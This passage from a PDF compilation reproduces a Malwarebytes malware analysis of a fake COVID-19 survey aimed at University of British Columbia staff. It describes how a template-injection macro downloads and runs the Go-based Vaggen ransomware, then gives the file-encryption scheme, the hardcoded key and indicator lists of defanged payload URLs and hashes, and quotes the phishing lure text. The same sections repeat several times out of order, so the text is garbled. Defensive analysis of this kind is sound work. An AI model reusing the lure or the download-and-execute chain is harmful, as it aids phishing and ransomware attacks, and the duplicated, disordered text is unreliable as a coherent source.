to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2358 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2359 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2360 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2361 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2362 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2363 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2364 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2365 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2366 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2367 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2368 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2369 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2370 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2371 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2372 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2373 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2374 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2375 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2376 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2377 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2378 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2379 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2380 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2381 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2382 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2383 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2384 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2385 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2386 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2387 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2388 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2389 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2390 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2391 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2392 of 